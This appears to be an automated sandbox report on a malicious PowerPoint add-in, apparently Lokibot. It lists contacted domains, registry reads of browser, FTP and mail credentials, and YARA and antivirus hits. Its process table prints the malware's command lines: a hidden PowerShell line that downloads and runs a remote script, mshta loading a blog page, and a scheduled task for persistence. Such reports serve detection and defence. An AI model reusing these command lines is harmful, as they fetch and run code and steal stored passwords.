https://news.google.com/?tab=jn | - | - | - | GET | CLEAN
https://mail.google.com/mail/?tab=jm | - | - | - | GET | CLEAN
https://meet.google.com/?hs=197 | - | - | - | GET | CLEAN
https://chat.google.com | - | - | - | GET | CLEAN
https://contacts.google.com/?hl=de&tab=jC | - | - | - | GET | CLEAN
https://drive.google.com/?tab=jo | - | - | - | GET | CLEAN
https://calendar.google.com/calendar?tab=jc | - | - | - | GET | CLEAN
https://translate.google.de/?hl=de&tab=jT | - | - | - | GET | CLEAN
https://photos.google.com/?tab=jq&pageId=none | - | - | - | GET | CLEAN
https://duo.google.com/?usp=duo_ald | - | - | - | GET | CLEAN
https://www.google.com/chrome/?brand=CHZO&utm_source=google.com&utm_medium=desktop-app-launcher&utm_campaign=desktop-app-launcher&utm_content=chrome-logo&utm_keyword=CHZO | - | - | - | GET | CLEAN
https://www.google.de/shopping?hl=de&source=og&tab=jf | - | - | - | GET | CLEAN
https://docs.google.com/document/?usp=docs_alc | - | - | - | GET | CLEAN
https://docs.google.com/spreadsheets/?usp=sheets_alc | - | - | - | GET | CLEAN
https://docs.google.com/presentation/?usp=slides_alc | - | - | - | GET | CLEAN
https://books.google.de/?hl=de&tab=jp | - | - | - | GET | CLEAN
https://www.blogger.com/?tab=jj | - | - | - | GET | CLEAN
https://hangouts.google.com | - | - | - | GET | CLEAN
https://keep.google.com | - | - | - | GET | CLEAN
https://jamboard.google.com/?usp=jam_ald | - | - | - | GET | CLEAN
https://earth.google.com/web/ | - | - | - | GET | CLEAN
https://www.google.de/save | - | - | - | GET | CLEAN
https://artsandculture.google.com/?hl=de&utm_source=ogs.google.com&utm_medium=referral | - | - | - | GET | CLEAN
https://ads.google.com/home/?subid=ww-ww-et-g-aw-a-vasquette_ads_cons_1!o2 | - | - | - | GET | CLEAN
https://podcasts.google.com | - | - | - | GET | CLEAN
https://stadia.google.com | - | - | - | GET | CLEAN
https://www.google.com/travel/?dest_src=al | - | - | - | GET | CLEAN
https://docs.google.com/forms/?usp=forms_alc | - | - | - | GET | CLEAN
https://accounts.google.com/ServiceLogin?service=blogger&continue=https://www.blogger.com/blogger.g&ec=GAZAHg | - | - | - | GET | CLEAN
http://www.blogger.com/content.g | - | - | - | GET | CLEAN
https://l0mx.blogspot.com/p/44.html?interstitial=ABqL8_gvbPXHD5jpqumPTlQCtBQgp8XaSPp4fUgU9ZuwTwjaS0cE_SN8DFw00XdM | - | - | - | GET | CLEAN
https://www.blogger.com/go/helpcenter | - | - | - | GET | CLEAN
https://www.blogger.com/go/discuss | - | - | - | GET | CLEAN
https://www.blogger.com/go/tutorials | - | - | - | GET | CLEAN
https://www.blogger.com/go/buzz | - | - | - | GET | CLEAN
https://www.blogger.com/go/devapi | - | - | - | GET | CLEAN
https://www.blogger.com/go/devforum | - | - | - | GET | CLEAN
https://www.blogger.com/go/terms | - | - | - | GET | CLEAN
https://www.blogger.com/go/privacy | - | - | - | GET | CLEAN
https://www.blogger.com/go/contentpolicy | - | - | - | GET | CLEAN
https://www.google.de/contact/impressum.html | - | - | - | GET | CLEAN
https://www.google-analytics.com/analytics.js | - | - | - | GET | CLEAN
https://www.blogger.com/static/v1/jsbin/3101730221-analytics_autotrack.js | - | - | - | GET | CLEAN
https://0v2x.blogspot.com/favicon.ico | - | - | - | GET | CLEAN
https://www.blogger.com/dyn-css/authorization.css?targetBlogID=1599313125304121436&zx=631e10cf-0d71-470c-af57-797d37f6668c | - | - | - | GET | CLEAN
https://0v2x.blogspot.com | - | - | - | GET | CLEAN
https://www.blogger.com/blogin.g?blogspotURL=https://0v2x.blogspot.com/p/44.html&type=blog | - | - | - | GET | CLEAN
https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Fl0mx.blogspot.com%2Fp%2F44.html&type=blog&bpli=1 | - | 142.250.184.233 | - | GET | CLEAN

Domain

Domain | IP Address | Country | Protocols | Verdict
bitly.com | 67.199.248.15, 67.199.248.14 | - | HTTPS, HTTP, DNS | CLEAN
ia801500.us.archive.org | 207.241.228.150 | - | HTTPS, HTTP, DNS | CLEAN
0v2x.blogspot.com | 142.250.186.129 | - | HTTPS, HTTP, DNS | CLEAN
google.com | - | - | HTTP | CLEAN
l0mx.blogspot.com | 142.250.186.129 | - | HTTPS, DNS | CLEAN
blogspot.l.googleusercontent.com | 142.250.186.129 | - | DNS | CLEAN
www.blogger.com | 142.250.184.233 | - | HTTPS, HTTP | CLEAN
resources.blogblog.com | - | - | HTTPS | CLEAN
accounts.google.com | - | - | HTTPS | CLEAN
fonts.googleapis.com | 142.250.186.138 | - | HTTP, DNS | CLEAN
www.google.com | - | - | HTTPS, HTTP | CLEAN
www.google-analytics.com | - | - | HTTPS | CLEAN
cpanel.com | - | - | HTTP | CLEAN
www.google.de | - | - | HTTPS | CLEAN
myaccount.google.com | - | - | HTTPS | CLEAN
maps.google.de | - | - | HTTPS | CLEAN
www.youtube.com | - | - | HTTPS | CLEAN
play.google.com | - | - | HTTPS | CLEAN
news.google.com | - | - | HTTPS | CLEAN
mail.google.com | - | - | HTTPS | CLEAN
meet.google.com | - | - | HTTPS | CLEAN
chat.google.com | - | - | HTTPS | CLEAN
contacts.google.com | - | - | HTTPS | CLEAN
drive.google.com | - | - | HTTPS | CLEAN
calendar.google.com | - | - | HTTPS | CLEAN
translate.google.de | - | - | HTTPS | CLEAN
photos.google.com | - | - | HTTPS | CLEAN
duo.google.com | - | - | HTTPS | CLEAN
docs.google.com | - | - | HTTPS | CLEAN
books.google.de | - | - | HTTPS | CLEAN
hangouts.google.com | - | - | HTTPS | CLEAN
keep.google.com HTTPS CLEAN

jamboard.google.com HTTPS CLEAN

earth.google.com HTTPS CLEAN

artsandculture.google.com HTTPS CLEAN

ads.google.com HTTPS CLEAN

podcasts.google.com HTTPS CLEAN

stadia.google.com HTTPS CLEAN

173.208.204.37 173.208.204.37 HTTP, DNS CLEAN

IP

IP Address Domains Country Protocols Verdict

207.241.228.150 ia801500.us.archive.org United States HTTPS, TCP, DNS MALICIOUS

173.208.204.37 United States HTTP, TCP, DNS MALICIOUS

172.217.18.110 www-google-analytics.l.google.com, www.google-analytics.com United States HTTPS, TCP, DNS CLEAN

172.217.18.100 www.google.com United States HTTPS, TCP, DNS CLEAN

142.250.184.233 blogger.l.google.com, resources.blogblog.com, www.blogger.com United States HTTPS, TCP, DNS CLEAN

142.250.185.205 accounts.google.com United States HTTPS, TCP, DNS CLEAN

142.250.186.129 blogspot.l.googleusercontent.com, 0v2x.blogspot.com, l0mx.blogspot.com United States HTTPS, HTTP, TCP, DNS CLEAN

67.199.248.14 bitly.com United States HTTPS, TCP, DNS CLEAN

142.250.186.138 fonts.googleapis.com United States HTTPS, TCP, DNS CLEAN

67.199.248.15 bitly.com United States DNS CLEAN

Email

-

Email Address

-

Mutex

Name Operations Parent Process Name Verdict

Local\MSIMGSIZECacheMutex access mshta.exe CLEAN

Global\PowerShell_CommandAnalysis_Lock_S-1-5-21-1560258661-3990802383-1811730007-1000 access powershell.exe CLEAN

B7274519EDDE9BDC8AE51348 access msbuild.exe CLEAN

Registry

Registry Key Operations Parent Process Name Verdict

HKEY_CLASSES_ROOT\clsid\{25336920-03f9-11cf-8fd0-00aa00686f13}\InProcServer32 read, access mshta.exe CLEAN

HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\ChakraRecycler access mshta.exe CLEAN

HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\ChakraRecycler access mshta.exe CLEAN

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE\Path read, access mshta.exe CLEAN

HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Application Compatibility\mshta.exe read, access mshta.exe CLEAN

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFileMenu read, access mshta.exe CLEAN

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Parental Controls\Users\S-1-5-21-1560258661-3990802383-1811730007-1000 access mshta.exe CLEAN

HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\JScriptLegacy access mshta.exe CLEAN

HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\JScriptLegacy access mshta.exe CLEAN

HKEY_CURRENT_USER\EUDC\1252 access mshta.exe CLEAN

HKEY_LOCAL_MACHINE\Software\Microsoft\Wbem\Scripting access mshta.exe CLEAN

HKEY_LOCAL_MACHINE\Software\Microsoft\Wbem\Scripting\Default Impersonation Level read, access mshta.exe CLEAN

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Script\Features access mshta.exe CLEAN

HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging access powershell.exe CLEAN

HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging access powershell.exe CLEAN

HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine access powershell.exe CLEAN

HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine\ApplicationBase read, access powershell.exe CLEAN

HKEY_CURRENT_USER\SOFTWARE\Microsoft\.NETFramework\XML access powershell.exe CLEAN

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\XML access powershell.exe CLEAN

HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment access powershell.exe CLEAN

HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment\__PSLockdownPolicy read, access powershell.exe CLEAN

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion access powershell.exe CLEAN

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\InstallationType read, access powershell.exe CLEAN

HKEY_CURRENT_USER access powershell.exe CLEAN

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections access powershell.exe CLEAN

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections access powershell.exe CLEAN

HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings access powershell.exe CLEAN

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework access powershell.exe CLEAN

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\LegacyWPADSupport read, access powershell.exe CLEAN

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v4.0.30319 access powershell.exe CLEAN

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v4.0.30319\HWRPortReuseOnSocketBind read, access powershell.exe CLEAN

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v4.0.30319\SchUseStrongCrypto read, access powershell.exe CLEAN

HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Application Compatibility\MsHtA.exe read, access mshta.exe CLEAN

HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\EventLog\ProtectedEventLogging access powershell.exe CLEAN

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography access msbuild.exe CLEAN

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid read, access msbuild.exe CLEAN

HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox\CurrentVersion read, access msbuild.exe CLEAN

HKEY_LOCAL_MACHINE\SOFTWARE\ComodoGroup\IceDragon\Setup\SetupPath read, access msbuild.exe CLEAN

HKEY_LOCAL_MACHINE\SOFTWARE\Apple Computer, Inc.\Safari\InstallDir read, access msbuild.exe CLEAN

HKEY_LOCAL_MACHINE\SOFTWARE\K-Meleon\CurrentVersion read, access msbuild.exe CLEAN

HKEY_LOCAL_MACHINE\SOFTWARE\mozilla.org\SeaMonkey\CurrentVersion read, access msbuild.exe CLEAN

HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\SeaMonkey\CurrentVersion read, access msbuild.exe CLEAN

HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Flock\CurrentVersion read, access msbuild.exe CLEAN

HKEY_CURRENT_USER\Software\QtWeb.NET\QtWeb Internet Browser\AutoComplete access msbuild.exe CLEAN

HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\IntelliForms\Storage2 access msbuild.exe CLEAN

HKEY_LOCAL_MACHINE\SOFTWARE\8pecxstudios\Cyberfox86\RootDir read, access msbuild.exe CLEAN

HKEY_LOCAL_MACHINE\SOFTWARE\8pecxstudios\Cyberfox\Path read, access msbuild.exe CLEAN

HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\\CurrentVersion read, access msbuild.exe CLEAN

HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Waterfox\CurrentVersion read, access msbuild.exe CLEAN

HKEY_CURRENT_USER\Software\LinasFTP\Site Manager access msbuild.exe CLEAN

HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings\LastPassword read, access msbuild.exe CLEAN

HKEY_CURRENT_USER\Software\Ghisler\Total Commander\FtpIniName read, access msbuild.exe CLEAN

HKEY_CURRENT_USER\Software access msbuild.exe CLEAN

HKEY_CURRENT_USER\Software\AppDataLow access msbuild.exe CLEAN

HKEY_CURRENT_USER\Software\IM Providers access msbuild.exe CLEAN

HKEY_CURRENT_USER\Software\Microsoft access msbuild.exe CLEAN

HKEY_CURRENT_USER\Software\Netscape access msbuild.exe CLEAN

HKEY_CURRENT_USER\Software\ODBC access msbuild.exe CLEAN

HKEY_CURRENT_USER\Software\Policies access msbuild.exe CLEAN

HKEY_CURRENT_USER\Software\RegisteredApplications access msbuild.exe CLEAN

HKEY_CURRENT_USER\Software\Wow6432Node access msbuild.exe CLEAN

HKEY_CURRENT_USER\Software\Classes access msbuild.exe CLEAN

HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts access msbuild.exe CLEAN

HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts access msbuild.exe CLEAN

HKEY_CURRENT_USER\Software\Bitvise\BvSshClient\LastUsedProfile read, access msbuild.exe CLEAN

HKEY_CURRENT_USER\Software\VanDyke\SecureFX\Config Path read, access msbuild.exe CLEAN

HKEY_LOCAL_MACHINE\Software\NCH Software\Fling\Accounts access msbuild.exe CLEAN

HKEY_CURRENT_USER\Software\NCH Software\Fling\Accounts access msbuild.exe CLEAN

HKEY_LOCAL_MACHINE\Software\NCH Software\ClassicFTP\FTPAccounts access msbuild.exe CLEAN

HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts access msbuild.exe CLEAN

HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions access msbuild.exe CLEAN

HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions access msbuild.exe CLEAN

HKEY_LOCAL_MACHINE\Software\SimonTatham\PuTTY\Sessions access msbuild.exe CLEAN

HKEY_LOCAL_MACHINE\Software\9bis.com\KiTTY\Sessions access msbuild.exe CLEAN

HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\\CurrentVersion read, access msbuild.exe CLEAN

HKEY_CURRENT_USER\Software\IncrediMail\Identities access msbuild.exe CLEAN

HKEY_LOCAL_MACHINE\Software\IncrediMail\Identities access msbuild.exe CLEAN

HKEY_CURRENT_USER\Software\Martin Prikryl access msbuild.exe CLEAN

HKEY_LOCAL_MACHINE\Software\Martin Prikryl access msbuild.exe CLEAN

HKEY_LOCAL_MACHINE\SOFTWARE\Postbox\Postbox\CurrentVersion read, access msbuild.exe CLEAN

HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\FossaMail\CurrentVersion read, access msbuild.exe CLEAN

HKEY_CURRENT_USER\Software\WinChips\UserAccounts access msbuild.exe CLEAN

HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook access msbuild.exe CLEAN

HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook access msbuild.exe CLEAN

HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook access msbuild.exe CLEAN

HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\0a0d020000000000c000000000000046 access msbuild.exe CLEAN

HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\0a0d020000000000c000000000000046\Email read, access msbuild.exe CLEAN

HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a access msbuild.exe CLEAN

HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a\Email read, access msbuild.exe CLEAN

HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\2db91c5fd8470d46b1a5bc5efab4cae7 access msbuild.exe CLEAN

HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\2db91c5fd8470d46b1a5bc5efab4cae7\Email read, access msbuild.exe CLEAN

HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\3517490d76624c419a828607e2a54604 access msbuild.exe CLEAN

HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\3517490d76624c419a828607e2a54604\Email read, access msbuild.exe CLEAN

HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\6c29d51f56390b45a924b3b787013a66 access msbuild.exe CLEAN

HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\6c29d51f56390b45a924b3b787013a66\Email read, access msbuild.exe CLEAN

HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\8503020000000000c000000000000046 access msbuild.exe CLEAN

HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\8503020000000000c000000000000046\Email read, access msbuild.exe CLEAN

HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\8763203907727d498bce4b981b157d7b access msbuild.exe CLEAN

HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\8763203907727d498bce4b981b157d7b\Email read, access msbuild.exe CLEAN

HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\893893ade607c44aa338ac7df5d6cb42 access msbuild.exe CLEAN

HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\893893ade607c44aa338ac7df5d6cb42\Email read, access msbuild.exe CLEAN

HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2 access msbuild.exe CLEAN

HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2\Email read, access msbuild.exe CLEAN

HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 access msbuild.exe CLEAN

HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\Email read, access msbuild.exe CLEAN

HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 access msbuild.exe CLEAN

HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\Email read, access msbuild.exe CLEAN

HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 access msbuild.exe CLEAN

HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\Email read, access msbuild.exe CLEAN

HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\SMTP Email Address read, access msbuild.exe CLEAN

HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\SMTP Server read, access msbuild.exe CLEAN

HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\SMTP User Name read, access msbuild.exe CLEAN

HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\SMTP User read, access msbuild.exe CLEAN

HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\POP3 Server read, access msbuild.exe CLEAN

HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\POP3 User Name read, access msbuild.exe CLEAN

HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\POP3 User read, access msbuild.exe CLEAN

HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\NNTP Email Address read, access msbuild.exe CLEAN

HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\NNTP User Name read, access msbuild.exe CLEAN

HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\NNTP Server read, access msbuild.exe CLEAN

HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\IMAP Server read, access msbuild.exe CLEAN

HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\IMAP User Name read, access msbuild.exe CLEAN

HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\IMAP User read, access msbuild.exe CLEAN

HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\HTTP User read, access msbuild.exe CLEAN

HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\HTTP Server URL read, access msbuild.exe CLEAN

HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\HTTPMail User Name read, access msbuild.exe CLEAN

HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\HTTPMail Server read, access msbuild.exe CLEAN

HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\POP3 Port read, access msbuild.exe CLEAN

HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\SMTP Port read, access msbuild.exe CLEAN

HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\IMAP Port read, access msbuild.exe CLEAN

HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\POP3 Password2 read, access msbuild.exe CLEAN

HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\IMAP Password2 read, access msbuild.exe CLEAN

HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\NNTP Password2 read, access msbuild.exe CLEAN

HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\HTTPMail Password2 read, access msbuild.exe CLEAN

HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\SMTP Password2 read, access msbuild.exe CLEAN

HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\POP3 Password read, access msbuild.exe CLEAN

HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\IMAP Password read, access msbuild.exe CLEAN

HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\NNTP Password read, access msbuild.exe CLEAN

HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\HTTP Password read, access msbuild.exe CLEAN

HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\SMTP Password read, access msbuild.exe CLEAN

HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 access msbuild.exe CLEAN

HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\Email read, access msbuild.exe CLEAN

HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\dc48e7c6d33441458035ee20beefe18a access msbuild.exe CLEAN

HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\dc48e7c6d33441458035ee20beefe18a\Email read, access msbuild.exe CLEAN

HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\e57f6d0b27b6134693ca7113a4ab34a6 access msbuild.exe CLEAN

HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\e57f6d0b27b6134693ca7113a4ab34a6\Email read, access msbuild.exe CLEAN

HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\f35c115766b7c94cb080da6869ae8f9d access msbuild.exe CLEAN

HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\f35c115766b7c94cb080da6869ae8f9d\Email read, access msbuild.exe CLEAN

HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001 access msbuild.exe CLEAN

HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001\Email read, access msbuild.exe CLEAN

HKEY_CURRENT_USER\SOFTWARE\flaska.net\trojita\imap.auth.pass read, access msbuild.exe CLEAN

Reduced dataset

Process

Process Name Commandline Verdict

mshta.exe C:\Windows\SysWOW64\mshta.exe https://1230948%[email protected]/awkdhikhasd SUSPICIOUS

powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h i'E'x(iwr('https://ia801500.us.archive.org/0/items/1_20210527_202...... /0/items/1_20210527_20210527/1.txt') -useB);i'E'x(iwr('https://ia801500.us.archive.org/0/items/1_20210527_20210527/1.txt') -useB); SUSPICIOUS

schtasks.exe "C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 80 /tn ""SECOTAKSA"" /F /tr ""\""MsHtA""\""http://1230948%[email protected]/p/44.html\"" SUSPICIOUS

mshta.exe MsHtA "http://1230948%[email protected]/p/44.html" SUSPICIOUS

msbuild.exe #cmd SUSPICIOUS

powerpnt.exe "C:\Program Files (x86)\Microsoft Office\Root\Office16\POWERPNT.EXE" CLEAN

svchost.exe C:\Windows\system32\svchost.exe -k netsvcs CLEAN

YARA / AV

YARA (2)

Ruleset Name Rule Name Rule Description File Type Filename Classification Verdict

Malware Lokibot Lokibot Stealer Memory Dump - Spyware 5/5

Malware Lokibot Lokibot Stealer Function Strings function_strings_process_13.txt Spyware 5/5

Antivirus (4)

File Type Threat Name Filename Verdict

EMBEDDED VBA:Amphitryon.217 ooo.bin MALICIOUS

SAMPLE VBA:Amphitryon.217 C:\Users\RDhJ0CNFevzX\Desktop\Request For Price quotation 1-6-2021.ppam MALICIOUS

MODIFIED VB:Trojan.Valyria.4726 - MALICIOUS

MEMORY_DUMP Gen:Variant.Razy.762033 - MALICIOUS

ENVIRONMENT

Virtual Machine Information

Name win10_64_th2_en_mso2016

Description win10_64_th2_en_mso2016

Architecture x86 64-bit

Operating System Windows 10 Threshold 2

Kernel Version 10.0.10586.0 (0de6dc23-8e19-4bb7-8608-d54b1e6fa379)

Network Scheme Name Local Gateway

Network Config Name Local Gateway

Analyzer Information

Analyzer Version 4.1.1

Dynamic Engine Version 4.1.1 / 02/08/2021 15:19

Static Engine Version 1.6.0

Built-in AV Version AVCORE v2.2 Linux/x86_64 11.0.1.19 (November 12, 2020)

Built-in AV Database Update Release Date 2021-06-01 05:09:28+00:00

VTI Ruleset Version 3.8

YARA Built-in Ruleset Version 1.5

Analysis Report Layout Version 10

Software Information

Adobe Acrobat Reader Version Not installed

Microsoft Office 2016

